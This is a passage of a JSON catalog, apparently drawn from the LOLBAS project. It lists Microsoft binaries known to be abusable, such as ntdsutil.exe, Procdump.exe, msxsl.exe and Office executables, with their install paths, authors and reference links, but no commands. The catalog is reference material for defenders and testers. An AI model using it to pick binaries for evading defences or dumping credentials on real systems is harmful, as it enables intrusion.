@vikas891","Naor Evgi @ghosts621"],"references":["https://lolbas-project.github.io/lolbas/OtherMSBinaries/Dxcap/"],"count":2},{"id":"lolbas:ecmangen-exe","name":"ECMangen.exe","source":"LOLBAS","platform":["Windows"],"toolType":"OtherMSBinary","aliases":[],"fullPath":["C:\\Program Files (x86)\\Microsoft SDKs\\Windows\\<version>\\Bin\\ECMangen.exe","C:\\Program Files (x86)\\Microsoft SDKs\\Windows\\<version>\\Bin\\x64\\ECMangen.exe","C:\\Program Files\\Microsoft\\Exchange Server\\<version>\\Bin\\ECMangen.exe","C:\\Program Files\\Microsoft\\Exchange Server\\Bin\\ECMangen.exe","C:\\Program Files\\Microsoft\\Exchange Server\\ClientAccess\\Bin\\ECMangen.exe","C:\\ExchangeServer\\Bin\\ECMangen.exe"],"author":"Avihay Eldad","created":"2024-04-30T00:00:00.000Z","contributors":["Avihay Eldad @AvihayEldad"],"references":["https://lolbas-project.github.io/lolbas/OtherMSBinaries/ECMangen/"],"count":1},{"id":"lolbas:excel-exe","name":"Excel.exe","source":"LOLBAS","platform":["Windows"],"toolType":"OtherMSBinary","aliases":[],"fullPath":["C:\\Program Files (x86)\\Microsoft Office 16\\ClientX86\\Root\\Office16\\Excel.exe","C:\\Program Files\\Microsoft Office 16\\ClientX64\\Root\\Office16\\Excel.exe","C:\\Program Files (x86)\\Microsoft Office\\Office16\\Excel.exe","C:\\Program Files\\Microsoft Office\\Office16\\Excel.exe","C:\\Program Files (x86)\\Microsoft Office 15\\ClientX86\\Root\\Office15\\Excel.exe","C:\\Program Files\\Microsoft Office 15\\ClientX64\\Root\\Office15\\Excel.exe","C:\\Program Files (x86)\\Microsoft Office\\Office15\\Excel.exe","C:\\Program Files\\Microsoft Office\\Office15\\Excel.exe","C:\\Program Files (x86)\\Microsoft Office 14\\ClientX86\\Root\\Office14\\Excel.exe","C:\\Program Files\\Microsoft Office 14\\ClientX64\\Root\\Office14\\Excel.exe","C:\\Program Files (x86)\\Microsoft Office\\Office14\\Excel.exe","C:\\Program Files\\Microsoft Office\\Office14\\Excel.exe","C:\\Program Files (x86)\\Microsoft Office\\Office12\\Excel.exe","C:\\Program Files\\Microsoft Office\\Office12\\Excel.exe","C:\\Program Files\\Microsoft Office\\Office12\\Excel.exe"],"author":"Reegun J (OCBC Bank)","created":"2019-07-19T00:00:00.000Z","contributors":["Reegun J (OCBC Bank) @reegun21"],"references":["https://lolbas-project.github.io/lolbas/OtherMSBinaries/Excel/"],"count":1},{"id":"lolbas:fsi-exe","name":"Fsi.exe","source":"LOLBAS","platform":["Windows"],"toolType":"OtherMSBinary","aliases":[],"fullPath":["C:\\Program Files\\dotnet\\sdk\\<version>\\FSharp\\fsi.exe","C:\\Program Files (x86)\\Microsoft Visual Studio\\2019\\Professional\\Common7\\IDE\\CommonExtensions\\Microsoft\\FSharp\\fsi.exe"],"author":"Jimmy (@bohops)","created":"2021-09-26T00:00:00.000Z","contributors":["Nick Tyrer @NickTyrer","Jimmy @bohops"],"references":["https://lolbas-project.github.io/lolbas/OtherMSBinaries/Fsi/"],"count":2},{"id":"lolbas:fsianycpu-exe","name":"FsiAnyCpu.exe","source":"LOLBAS","platform":["Windows"],"toolType":"OtherMSBinary","aliases":[],"fullPath":["c:\\Program Files (x86)\\Microsoft Visual Studio\\2019\\Professional\\Common7\\IDE\\CommonExtensions\\Microsoft\\FSharp\\fsianycpu.exe"],"author":"Jimmy (@bohops)","created":"2021-09-26T00:00:00.000Z","contributors":["Nick Tyrer @NickTyrer","Jimmy @bohops"],"references":["https://lolbas-project.github.io/lolbas/OtherMSBinaries/FsiAnyCpu/"],"count":2},{"id":"lolbas:intellitrace-exe","name":"IntelliTrace.exe","source":"LOLBAS","platform":["Windows"],"toolType":"OtherMSBinary","aliases":[],"fullPath":["C:\\Program Files\\Microsoft Visual Studio\\2022\\Community\\Common7\\IDE\\CommonExtensions\\Microsoft\\IntelliTrace\\IntelliTrace.exe","C:\\Program Files (x86)\\Microsoft Visual Studio\\2022\\Community\\Common7\\IDE\\CommonExtensions\\Microsoft\\IntelliTrace\\IntelliTrace.exe"],"author":"Avihay Eldad","created":"2025-09-21T00:00:00.000Z","contributors":["Avihay Eldad @AvihayEldad"],"references":["https://lolbas-project.github.io/lolbas/OtherMSBinaries/IntelliTrace/"],"count":1},{"id":"lolbas:logger-exe","name":"Logger.exe","source":"LOLBAS","platform":["Windows"],"toolType":"OtherMSBinary","aliases":[],"fullPath":["C:\\Program Files (x86)\\Windows Kits\\10\\Debuggers\\x86\\logger.exe","C:\\Program Files (x86)\\Windows Kits\\10\\Debuggers\\x64\\logger.exe","C:\\Program Files\\Windows Kits\\10\\Debuggers\\x86\\logger.exe","C:\\Program Files\\Windows Kits\\10\\Debuggers\\x64\\logger.exe"],"author":"Avihay Eldad","created":"2025-07-13T00:00:00.000Z","contributors":["Avihay Eldad @AvihayEldad"],"references":["https://lolbas-project.github.io/lolbas/OtherMSBinaries/Logger/"],"count":3},{"id":"lolbas:mftrace-exe","name":"Mftrace.exe","source":"LOLBAS","platform":["Windows"],"toolType":"OtherMSBinary","aliases":[],"fullPath":["C:\\Program Files (x86)\\Windows Kits\\10\\bin\\10.0.16299.0\\x86\\mftrace.exe","C:\\Program Files (x86)\\Windows Kits\\10\\bin\\10.0.16299.0\\x64\\mftrace.exe","C:\\Program Files (x86)\\Windows Kits\\10\\bin\\x86\\mftrace.exe","C:\\Program Files (x86)\\Windows Kits\\10\\bin\\x64\\mftrace.exe"],"author":"Oddvar Moe","created":"2018-05-25T00:00:00.000Z","contributors":["fabrizio @0rbz_"],"references":["https://lolbas-project.github.io/lolbas/OtherMSBinaries/Mftrace/"],"count":1},{"id":"lolbas:microsoft-nodejstools-pressanykey-exe","name":"Microsoft.NodejsTools.PressAnyKey.exe","source":"LOLBAS","platform":["Windows"],"toolType":"OtherMSBinary","aliases":[],"fullPath":["C:\\Program Files\\Microsoft Visual Studio\\<version>\\Community\\Common7\\IDE\\Extensions\\Microsoft\\NodeJsTools\\NodeJsTools\\Microsoft.NodejsTools.PressAnyKey.exe","C:\\Program Files (x86)\\Microsoft Visual Studio\\<version>\\Community\\Common7\\IDE\\Extensions\\Microsoft\\NodeJsTools\\NodeJsTools\\Microsoft.NodejsTools.PressAnyKey.exe"],"author":"mr.d0x","created":"2022-01-20T00:00:00.000Z","contributors":["mr.d0x @mrd0x"],"references":["https://lolbas-project.github.io/lolbas/OtherMSBinaries/Microsoft.NodejsTools.PressAnyKey/"],"count":1},{"id":"lolbas:mpiexec-exe","name":"Mpiexec.exe","source":"LOLBAS","platform":["Windows"],"toolType":"OtherMSBinary","aliases":[],"fullPath":["C:\\Program Files\\Microsoft MPI\\Bin\\mpiexec.exe","C:\\Program Files (x86)\\Microsoft MPI\\Bin\\mpiexec.exe"],"author":"Avihay Eldad","created":"2025-09-25T00:00:00.000Z","contributors":["Avihay Eldad @AvihayEldad"],"references":["https://lolbas-project.github.io/lolbas/OtherMSBinaries/Mpiexec/"],"count":1},{"id":"lolbas:msaccess-exe","name":"MSAccess.exe","source":"LOLBAS","platform":["Windows"],"toolType":"OtherMSBinary","aliases":[],"fullPath":["C:\\Program Files (x86)\\Microsoft Office 16\\ClientX86\\Root\\Office16\\MSAccess.exe","C:\\Program Files\\Microsoft Office 16\\ClientX64\\Root\\Office16\\MSAccess.exe","C:\\Program Files (x86)\\Microsoft Office\\Office16\\MSAccess.exe","C:\\Program Files\\Microsoft Office\\Office16\\MSAccess.exe","C:\\Program Files (x86)\\Microsoft Office 15\\ClientX86\\Root\\Office15\\MSAccess.exe","C:\\Program Files\\Microsoft Office 15\\ClientX64\\Root\\Office15\\MSAccess.exe","C:\\Program Files (x86)\\Microsoft Office\\Office15\\MSAccess.exe","C:\\Program Files\\Microsoft Office\\Office15\\MSAccess.exe","C:\\Program Files (x86)\\Microsoft Office 14\\ClientX86\\Root\\Office14\\MSAccess.exe","C:\\Program Files\\Microsoft Office 14\\ClientX64\\Root\\Office14\\MSAccess.exe","C:\\Program Files (x86)\\Microsoft Office\\Office14\\MSAccess.exe","C:\\Program Files\\Microsoft Office\\Office14\\MSAccess.exe","C:\\Program Files (x86)\\Microsoft Office\\Office12\\MSAccess.exe","C:\\Program Files\\Microsoft Office\\Office12\\MSAccess.exe"],"author":"Nir Chako","created":"2023-04-30T00:00:00.000Z","contributors":["Nir Chako @C_h4ck_0"],"references":["https://lolbas-project.github.io/lolbas/OtherMSBinaries/MSAccess/"],"count":1},{"id":"lolbas:mscopilot-exe","name":"Mscopilot.exe","source":"LOLBAS","platform":["Windows"],"toolType":"OtherMSBinary","aliases":[],"fullPath":["C:\\Program Files (x86)\\Microsoft\\Copilot\\Application\\mscopilot.exe"],"author":"4n4s4zi","created":"2026-04-14T00:00:00.000Z","contributors":["4n4s4zi @4n4s4zi"],"references":["https://lolbas-project.github.io/lolbas/OtherMSBinaries/Mscopilot/"],"count":1},{"id":"lolbas:mscopilot-proxy-exe","name":"Mscopilot_proxy.exe","source":"LOLBAS","platform":["Windows"],"toolType":"OtherMSBinary","aliases":[],"fullPath":["C:\\Program Files (x86)\\Microsoft\\Copilot\\Application\\mscopilot_proxy.exe"],"author":"4n4s4zi","created":"2026-04-14T00:00:00.000Z","contributors":["4n4s4zi @4n4s4zi"],"references":["https://lolbas-project.github.io/lolbas/OtherMSBinaries/Mscopilot_proxy/"],"count":1},{"id":"lolbas:msdeploy-exe","name":"Msdeploy.exe","source":"LOLBAS","platform":["Windows"],"toolType":"OtherMSBinary","aliases":[],"fullPath":["C:\\Program Files\\IIS\\Microsoft Web Deploy V2\\msdeploy.exe","C:\\Program Files (x86)\\IIS\\Microsoft Web Deploy V2\\msdeploy.exe","C:\\Program Files\\IIS\\Microsoft Web Deploy V3\\msdeploy.exe","C:\\Program Files (x86)\\IIS\\Microsoft Web Deploy V3\\msdeploy.exe","C:\\Program Files\\IIS\\Microsoft Web Deploy V4\\msdeploy.exe","C:\\Program Files (x86)\\IIS\\Microsoft Web Deploy V4\\msdeploy.exe","C:\\Program Files\\IIS\\Microsoft Web Deploy V5\\msdeploy.exe","C:\\Program Files (x86)\\IIS\\Microsoft Web Deploy V5\\msdeploy.exe"],"author":"Oddvar Moe","created":"2018-05-25T00:00:00.000Z","contributors":["Pierre-Alexandre Braeken @pabraeken","Avihay Eldad @AvihayEldad"],"references":["https://lolbas-project.github.io/lolbas/OtherMSBinaries/Msdeploy/"],"count":3},{"id":"lolbas:msohtmed-exe","name":"MsoHtmEd.exe","source":"LOLBAS","platform":["Windows"],"toolType":"OtherMSBinary","aliases":[],"fullPath":["C:\\Program Files (x86)\\Microsoft Office 16\\ClientX86\\Root\\Office16\\MSOHTMED.exe","C:\\Program Files\\Microsoft Office 16\\ClientX64\\Root\\Office16\\MSOHTMED.exe","C:\\Program Files (x86)\\Microsoft Office\\Office16\\MSOHTMED.exe","C:\\Program Files\\Microsoft Office\\Office16\\MSOHTMED.exe","C:\\Program Files (x86)\\Microsoft Office 15\\ClientX86\\Root\\Office15\\MSOHTMED.exe","C:\\Program Files\\Microsoft Office 15\\ClientX64\\Root\\Office15\\MSOHTMED.exe","C:\\Program Files (x86)\\Microsoft Office\\Office15\\MSOHTMED.exe","C:\\Program Files\\Microsoft Office\\Office15\\MSOHTMED.exe","C:\\Program Files (x86)\\Microsoft Office 14\\ClientX86\\Root\\Office14\\MSOHTMED.exe","C:\\Program Files\\Microsoft Office 14\\ClientX64\\Root\\Office14\\MSOHTMED.exe","C:\\Program Files (x86)\\Microsoft Office\\Office14\\MSOHTMED.exe","C:\\Program Files\\Microsoft Office\\Office14\\MSOHTMED.exe","C:\\Program Files (x86)\\Microsoft Office\\Office12\\MSOHTMED.exe","C:\\Program Files\\Microsoft Office\\Office12\\MSOHTMED.exe","C:\\Program Files\\Microsoft Office\\Office12\\MSOHTMED.exe"],"author":"Nir Chako","created":"2022-07-24T00:00:00.000Z","contributors":["Nir Chako (Pentera) @C_h4ck_0"],"references":["https://lolbas-project.github.io/lolbas/OtherMSBinaries/MsoHtmEd/"],"count":1},{"id":"lolbas:mspub-exe","name":"Mspub.exe","source":"LOLBAS","platform":["Windows"],"toolType":"OtherMSBinary","aliases":[],"fullPath":["C:\\Program Files (x86)\\Microsoft Office 16\\ClientX86\\Root\\Office16\\MSPUB.exe","C:\\Program Files\\Microsoft Office 16\\ClientX64\\Root\\Office16\\MSPUB.exe","C:\\Program Files (x86)\\Microsoft Office\\Office16\\MSPUB.exe","C:\\Program Files\\Microsoft Office\\Office16\\MSPUB.exe","C:\\Program Files (x86)\\Microsoft Office 15\\ClientX86\\Root\\Office15\\MSPUB.exe","C:\\Program Files\\Microsoft Office 15\\ClientX64\\Root\\Office15\\MSPUB.exe","C:\\Program Files (x86)\\Microsoft Office\\Office15\\MSPUB.exe","C:\\Program Files\\Microsoft Office\\Office15\\MSPUB.exe","C:\\Program Files (x86)\\Microsoft Office 14\\ClientX86\\Root\\Office14\\MSPUB.exe","C:\\Program Files\\Microsoft Office 14\\ClientX64\\Root\\Office14\\MSPUB.exe","C:\\Program Files (x86)\\Microsoft Office\\Office14\\MSPUB.exe","C:\\Program Files\\Microsoft Office\\Office14\\MSPUB.exe"],"author":"Nir Chako","created":"2022-08-02T00:00:00.000Z","contributors":["Nir Chako (Pentera) @C_h4ck_0"],"references":["https://lolbas-project.github.io/lolbas/OtherMSBinaries/Mspub/"],"count":1},{"id":"lolbas:msxsl-exe","name":"msxsl.exe","source":"LOLBAS","platform":["Windows"],"toolType":"OtherMSBinary","aliases":[],"fullPath":["no default"],"author":"Oddvar Moe","created":"2018-05-25T00:00:00.000Z","contributors":["Casey Smith @subtee","Ronnie Salomonsen @r0ns3n"],"references":["https://lolbas-project.github.io/lolbas/OtherMSBinaries/msxsl/"],"count":6},{"id":"lolbas:nmcap-exe","name":"Nmcap.exe","source":"LOLBAS","platform":["Windows"],"toolType":"OtherMSBinary","aliases":[],"fullPath":["C:\\Program Files\\Microsoft Network Monitor 3\\nmcap.exe","C:\\Program Files (x86)\\Microsoft Network Monitor 3\\nmcap.exe"],"author":"Avihay Eldad","created":"2025-09-16T00:00:00.000Z","contributors":["Avihay Eldad @AvihayEldad"],"references":["https://lolbas-project.github.io/lolbas/OtherMSBinaries/Nmcap/"],"count":1},{"id":"lolbas:ntdsutil-exe","name":"ntdsutil.exe","source":"LOLBAS","platform":["Windows"],"toolType":"OtherMSBinary","aliases":[],"fullPath":["C:\\Windows\\System32\\ntdsutil.exe"],"author":"Tony Lambert","created":"2020-01-10T00:00:00.000Z","contributors":["Sean Metcalf @PyroTek3"],"references":["https://lolbas-project.github.io/lolbas/OtherMSBinaries/ntdsutil/"],"count":1},{"id":"lolbas:ntsd-exe","name":"Ntsd.exe","source":"LOLBAS","platform":["Windows"],"toolType":"OtherMSBinary","aliases":[],"fullPath":["C:\\Program Files (x86)\\Windows Kits\\10\\Debuggers\\x64\\ntsd.exe","C:\\Program Files (x86)\\Windows Kits\\10\\Debuggers\\x86\\ntsd.exe","C:\\Program Files (x86)\\Windows Kits\\10\\Debuggers\\arm\\ntsd.exe","C:\\Program Files (x86)\\Windows Kits\\10\\Debuggers\\arm64\\ntsd.exe"],"author":"Avihay Eldad","created":"2025-07-16T00:00:00.000Z","contributors":["Avihay Eldad @AvihayEldad"],"references":["https://lolbas-project.github.io/lolbas/OtherMSBinaries/Ntsd/"],"count":1},{"id":"lolbas:openconsole-exe","name":"OpenConsole.exe","source":"LOLBAS","platform":["Windows"],"toolType":"OtherMSBinary","aliases":[],"fullPath":["C:\\Program Files (x86)\\Microsoft Visual Studio\\2019\\Community\\Common7\\IDE\\CommonExtensions\\Microsoft\\Terminal\\ServiceHub\\os64\\OpenConsole.exe","C:\\Program Files (x86)\\Microsoft Visual Studio\\2019\\Community\\Common7\\IDE\\CommonExtensions\\Microsoft\\Terminal\\ServiceHub\\os86\\OpenConsole.exe","C:\\Program Files\\Microsoft Visual Studio\\2022\\Community\\Common7\\IDE\\CommonExtensions\\Microsoft\\Terminal\\ServiceHub\\os64\\OpenConsole.exe","C:\\Program Files\\WindowsApps\\Microsoft.WindowsTerminal_1.18.10301.0_x64__8wekyb3d8bbwe\\OpenConsole.exe"],"author":"Nasreddine Bencherchali","created":"2022-06-17T00:00:00.000Z","contributors":["Nasreddine Bencherchali @nas_bench"],"references":["https://lolbas-project.github.io/lolbas/OtherMSBinaries/OpenConsole/"],"count":1},{"id":"lolbas:outlook-exe","name":"Outlook.exe","source":"LOLBAS","platform":["Windows"],"toolType":"OtherMSBinary","aliases":[],"fullPath":["C:\\Program Files (x86)\\Microsoft Office 16\\ClientX86\\Root\\Office16\\Outlook.exe","C:\\Program Files\\Microsoft Office 16\\ClientX64\\Root\\Office16\\Outlook.exe","C:\\Program Files (x86)\\Microsoft Office\\Office16\\Outlook.exe","C:\\Program Files\\Microsoft Office\\Office16\\Outlook.exe","C:\\Program Files (x86)\\Microsoft Office 15\\ClientX86\\Root\\Office15\\Outlook.exe","C:\\Program Files\\Microsoft Office 15\\ClientX64\\Root\\Office15\\Outlook.exe","C:\\Program Files (x86)\\Microsoft Office\\Office15\\Outlook.exe","C:\\Program Files\\Microsoft Office\\Office15\\Outlook.exe","C:\\Program Files (x86)\\Microsoft Office 14\\ClientX86\\Root\\Office14\\Outlook.exe","C:\\Program Files\\Microsoft Office 14\\ClientX64\\Root\\Office14\\Outlook.exe","C:\\Program Files (x86)\\Microsoft Office\\Office14\\Outlook.exe","C:\\Program Files\\Microsoft Office\\Office14\\Outlook.exe","C:\\Program Files (x86)\\Microsoft Office\\Office12\\Outlook.exe","C:\\Program Files\\Microsoft Office\\Office12\\Outlook.exe","C:\\Program Files\\Microsoft Office\\Office12\\Outlook.exe"],"author":"Nir Chako","created":"2022-11-08T00:00:00.000Z","contributors":["Nir Chako (Pentera) @C_h4ck_0"],"references":["https://lolbas-project.github.io/lolbas/OtherMSBinaries/Outlook/"],"count":1},{"id":"lolbas:pixtool-exe","name":"Pixtool.exe","source":"LOLBAS","platform":["Windows"],"toolType":"OtherMSBinary","aliases":[],"fullPath":["C:\\Program Files\\Microsoft PIX\\pixtool.exe","C:\\Program Files (x86)\\Microsoft PIX\\pixtool.exe"],"author":"Avihay Eldad","created":"2025-09-21T00:00:00.000Z","contributors":["Avihay Eldad @AvihayEldad"],"references":["https://lolbas-project.github.io/lolbas/OtherMSBinaries/Pixtool/"],"count":1},{"id":"lolbas:powerpnt-exe","name":"Powerpnt.exe","source":"LOLBAS","platform":["Windows"],"toolType":"OtherMSBinary","aliases":[],"fullPath":["C:\\Program Files (x86)\\Microsoft Office 16\\ClientX86\\Root\\Office16\\Powerpnt.exe","C:\\Program Files\\Microsoft Office 16\\ClientX64\\Root\\Office16\\Powerpnt.exe","C:\\Program Files (x86)\\Microsoft Office\\Office16\\Powerpnt.exe","C:\\Program Files\\Microsoft Office\\Office16\\Powerpnt.exe","C:\\Program Files (x86)\\Microsoft Office 15\\ClientX86\\Root\\Office15\\Powerpnt.exe","C:\\Program Files\\Microsoft Office 15\\ClientX64\\Root\\Office15\\Powerpnt.exe","C:\\Program Files (x86)\\Microsoft Office\\Office15\\Powerpnt.exe","C:\\Program Files\\Microsoft Office\\Office15\\Powerpnt.exe","C:\\Program Files (x86)\\Microsoft Office 14\\ClientX86\\Root\\Office14\\Powerpnt.exe","C:\\Program Files\\Microsoft Office 14\\ClientX64\\Root\\Office14\\Powerpnt.exe","C:\\Program Files (x86)\\Microsoft Office\\Office14\\Powerpnt.exe","C:\\Program Files\\Microsoft Office\\Office14\\Powerpnt.exe","C:\\Program Files (x86)\\Microsoft Office\\Office12\\Powerpnt.exe","C:\\Program Files\\Microsoft Office\\Office12\\Powerpnt.exe","C:\\Program Files\\Microsoft Office\\Office12\\Powerpnt.exe"],"author":"Reegun J (OCBC Bank)","created":"2019-07-19T00:00:00.000Z","contributors":["Reegun J (OCBC Bank) @reegun21"],"references":["https://lolbas-project.github.io/lolbas/OtherMSBinaries/Powerpnt/"],"count":1},{"id":"lolbas:procdump-exe","name":"Procdump.exe","source":"LOLBAS","platform":["Windows"],"toolType":"OtherMSBinary","aliases":["Procdump64.exe"],"fullPath":["no default"],"author":"Alfie Champion (@ajpc500)","created":"2020-10-14T00:00:00.000Z","contributors":["Alfie Champion @ajpc500"],"references":["https://lolbas-project.github.io/lolbas/OtherMSBinaries/Procdump/"],"count":2},{"id":"lolbas:protocolhandler-exe","name":"ProtocolHandler.exe","source":"LOLBAS","platform":["Windows"],"toolType":"OtherMSBinary","aliases":[],"fullPath":["C:\\Program Files (x86)\\Microsoft Office 16\\ClientX86\\Root\\Office16\\ProtocolHandler.exe","C:\\Program Files\\Microsoft Office 16\\ClientX64\\Root\\Office16\\ProtocolHandler.exe","C:\\Program Files (x86)\\Microsoft Office\\Office16\\ProtocolHandler.exe","C:\\Program Files\\Microsoft Office\\Office16\\ProtocolHandler.exe","C:\\Program Files (x86)\\Microsoft Office 15\\ClientX86\\Root\\Office15\\ProtocolHandler.exe","C:\\Program Files\\Microsoft Office 15\\ClientX64\\Root\\Office15\\ProtocolHandler.exe","C:\\Program Files (x86)\\Microsoft Office\\Office15\\ProtocolHandler.exe","C:\\Program Files\\Microsoft Office\\Office15\\ProtocolHandler.exe"],"author":"Nir Chako","created":"2022-07-24T00:00:00.000Z","contributors":["Nir Chako (Pentera) @C_h4ck_0"],"references":["https://lolbas-project.github.io/lolbas/OtherMSBinaries/ProtocolHandler/"],"count":1},{"id":"lolbas:rcsi-exe","name":"rcsi.exe","source":"LOLBAS","platform":["Windows"],"toolType":"OtherMSBinary","aliases":[],"fullPath":["no default"],"author":"Oddvar Moe","created":"2018-05-25T00:00:00.000Z","contributors":["Matt Nelson @enigma0x3"],"references":["https://lolbas-project.github.io/lolbas/OtherMSBinaries/rcsi/"],"count":2},{"id":"lolbas:remote-exe","name":"Remote.exe","source":"LOLBAS","platform":["Windows"],"toolType":"OtherMSBinary","aliases":[],"fullPath":["C:\\Program Files (x86)\\Windows Kits\\10\\Debuggers\\x64\\remote.exe","C:\\Program Files (x86)\\Windows Kits\\10\\Debuggers\\x86\\remote.exe"],"author":"mr.d0x","created":"2021-06-01T00:00:00.000Z","contributors":["mr.d0x @mrd0x"],"references":["https://lolbas-project.github.io/lolbas/OtherMSBinaries/Remote/"],"count":3},{"id":"lolbas:sqldumper-exe","name":"Sqldumper.exe","source":"LOLBAS","platform":["Windows"],"toolType":"OtherMSBinary","aliases":[],"fullPath":["C:\\Program Files\\Microsoft SQL Server\\90\\Shared\\SQLDumper.exe","C:\\Program Files (x86)\\Microsoft Office\\root\\vfs\\ProgramFilesX86\\Microsoft Analysis\\AS OLEDB\\140\\SQLDumper.exe","C:\\Program Files\\Microsoft Power BI Desktop\\bin\\SqlDumper.exe"],"author":"Oddvar Moe","created":"2018-05-25T00:00:00.000Z","contributors":["Luis Rocha @countuponsec"],"references":["https://lolbas-project.github.io/lolbas/OtherMSBinaries/Sqldumper/"],"count":2},{"id":"lolbas:sqlps-exe","name":"Sqlps.exe","source":"LOLBAS","platform":["Windows"],"toolType":"OtherMSBinary","aliases":[],"fullPath":["C:\\Program files (x86)\\Microsoft SQL Server\\100\\Tools\\Binn\\sqlps.exe","C:\\Program files (x86)\\Microsoft SQL Server\\110\\Tools\\Binn\\sqlps.exe","C:\\Program files (x86)\\Microsoft SQL Server\\120\\Tools\\Binn\\sqlps.exe","C:\\Program files (x86)\\Microsoft SQL Server\\130\\Tools\\Binn\\sqlps.exe","C:\\Program Files (x86)\\Microsoft SQL Server\\150\\Tools\\Binn\\SQLPS.exe"],"author":"Oddvar Moe","created":"2018-05-25T00:00:00.000Z","contributors":["Bryon @bryon_","Manny @ManuelBerrueta"],"references":["https://lolbas-project.github.io/lolbas/OtherMSBinaries/Sqlps/"],"count":1},{"id":"lolbas:sqltoolsps-exe","name":"SQLToolsPS.exe","source":"LOLBAS","platform":["Windows"],"toolType":"OtherMSBinary","aliases":[],"fullPath":["C:\\Program files (x86)\\Microsoft SQL Server\\130\\Tools\\Binn\\sqlps.exe"],"author":"Oddvar Moe","created":"2018-05-25T00:00:00.000Z","contributors":["Pierre-Alexandre Braeken @pabraeken"],"references":["https://lolbas-project.github.io/lolbas/OtherMSBinaries/SQLToolsPS/"],"count":1},{"id":"lolbas:squirrel-exe","name":"Squirrel.exe","source":"LOLBAS","platform":["Windows"],"toolType":"OtherMSBinary","aliases":[],"fullPath":["C:\\Users\\<username>\\AppData\\Local\\Microsoft\\Teams\\current\\Squirrel.exe"],"author":"Reegun J (OCBC Bank) - @reegun21","created":"2019-06-26T00:00:00.000Z","contributors":["Reegun J (OCBC Bank) @reegun21","Adam @Hexacorn"],"references":["https://lolbas-project.github.io/lolbas/OtherMSBinaries/Squirrel/"],"count":5},{"id":"lolbas:te-exe","name":"te.exe","source":"LOLBAS","platform":["Windows"],"toolType":"OtherMSBinary","aliases":[],"fullPath":["no default"],"author":"Oddvar Moe","created":"2018-05-25T00:00:00.000Z","contributors":["Giuseppe N3mes1s @gN3mes1s","Avihay Eldad @AvihayEldad"],"references":["https://lolbas-project.github.io/lolbas/OtherMSBinaries/te/"],"count":2},{"id":"lolbas:teams-exe","name":"Teams.exe","source":"LOLBAS","platform":["Windows"],"toolType":"OtherMSBinary","aliases":[],"fullPath":["C:\\Users\\<username>\\AppData\\Local\\Microsoft\\Teams\\current\\Teams.exe"],"author":"Andrew Kisliakov","created":"2022-01-17T00:00:00.000Z","contributors":["Andrew Kisliakov","mr.d0x @mrd0x"],"references":["https://lolbas-project.github.io/lolbas/OtherMSBinaries/Teams/"],"count":3},{"id":"lolbas:testwindowremoteagent-exe","name":"TestWindowRemoteAgent.exe","source":"LOLBAS","platform":["Windows"],"toolType":"OtherMSBinary","aliases":[],"fullPath":["C:\\Program Files\\Microsoft Visual Studio\\2022\\Community\\Common7\\IDE\\CommonExtensions\\Microsoft\\TestWindow\\RemoteAgent\\TestWindowRemoteAgent.exe"],"author":"Onat Uzunyayla","created":"2023-08-21T00:00:00.000Z","contributors":["Onat Uzunyayla"],"references":["https://lolbas-project.github.io/lolbas/OtherMSBinaries/TestWindowRemoteAgent/"],"count":1},{"id":"lolbas:tracker-exe","name":"Tracker.exe","source":"LOLBAS","platform":["Windows"],"toolType":"OtherMSBinary","aliases":[],"fullPath":["no default"],"author":"Oddvar Moe","created":"2018-05-25T00:00:00.000Z","contributors":["Casey Smith @subTee"],"references":["https://lolbas-project.github.io/lolbas/OtherMSBinaries/Tracker/"],"count":2},{"id":"lolbas:update-exe","name":"Update.exe","source":"LOLBAS","platform":["Windows"],"toolType":"OtherMSBinary","aliases":[],"fullPath":["C:\\Users\\<username>\\AppData\\Local\\Microsoft\\Teams\\update.exe"],"author":"Oddvar Moe","created":"2019-06-26T00:00:00.000Z","contributors":["Reegun Richard Jayapaul (SpiderLabs, Trustwave) @reegun21","Mr.Un1k0d3r @MrUn1k0d3r","Adam @Hexacorn","Jesus Galvez"],"references":["https://lolbas-project.github.io/lolbas/OtherMSBinaries/Update/"],"count":13},{"id":"lolbas:vsdiagnostics-exe","name":"VSDiagnostics.exe","source":"LOLBAS","platform":["Windows"],"toolType":"OtherMSBinary","aliases":[],"fullPath":["C:\\Program Files\\Microsoft Visual Studio\\2022\\Community\\Team Tools\\DiagnosticsHub\\Collector\\VSDiagnostics.exe"],"author":"Bobby Cooke","created":"2023-07-12T00:00:00.000Z","contributors":["Bobby Cooke @0xBoku"],"references":["https://lolbas-project.github.io/lolbas/OtherMSBinaries/VSDiagnostics/"],"count":2},{"id":"lolbas:vsiisexelauncher-exe","name":"VSIISExeLauncher.exe","source":"LOLBAS","platform":["Windows"],"toolType":"OtherMSBinary","aliases":[],"fullPath":["C:\\Program Files (x86)\\Microsoft Visual Studio\\2019\\Community\\Common7\\IDE\\Extensions\\Microsoft\\Web Tools\\ProjectSystem\\VSIISExeLauncher.exe"],"author":"timwhite","created":"2021-09-24T00:00:00.000Z","contributors":["timwhite"],"references":["https://lolbas-project.github.io/lolbas/OtherMSBinaries/VSIISExeLauncher/"],"count":1},{"id":"lolbas:visio-exe","name":"Visio.exe","source":"LOLBAS","platform":["Windows"],"toolType":"OtherMSBinary","aliases":[],"fullPath":["C:\\Program Files (x86)\\Microsoft Office\\Office14\\Visio.exe","C:\\Program Files\\Microsoft Office\\Office14\\Visio.exe","C:\\Program Files (x86)\\Microsoft Office\\Office15\\Visio.exe","C:\\Program Files\\Microsoft Office\\Office15\\Visio.exe","C:\\Program Files (x86)\\Microsoft Office\\Office16\\Visio.exe","C:\\Program Files\\Microsoft Office\\Office16\\Visio.exe","C:\\Program Files (x86)\\Microsoft Office\\root\\Office14\\Visio.exe","C:\\Program Files\\Microsoft Office\\root\\Office14\\Visio.exe","C:\\Program Files (x86)\\Microsoft Office\\root\\Office15\\Visio.exe","C:\\Program Files\\Microsoft Office\\root\\Office15\\Visio.exe","C:\\Program Files (x86)\\Microsoft Office\\root\\Office16\\Visio.exe","C:\\Program Files\\Microsoft Office\\root\\Office16\\Visio.exe"],"author":"Avihay Eldad","created":"2024-02-15T00:00:00.000Z","contributors":["Avihay Eldad @AvihayEldad"],"references":["https://lolbas-project.github.io/lolbas/OtherMSBinaries/Visio/"],"count":1},{"id":"lolbas:visualuiaverifynative-exe","name":"VisualUiaVerifyNative.exe","source":"LOLBAS","platform":["Windows"],"toolType":"OtherMSBinary","aliases":[],"fullPath":["c:\\Program Files (x86)\\Windows Kits\\10\\bin\\<version>\\arm64\\UIAVerify\\VisualUiaVerifyNative.exe","c:\\Program Files (x86)\\Windows Kits\\10\\bin\\<version>\\x64\\UIAVerify\\VisualUiaVerifyNative.exe","c:\\Program Files (x86)\\Windows 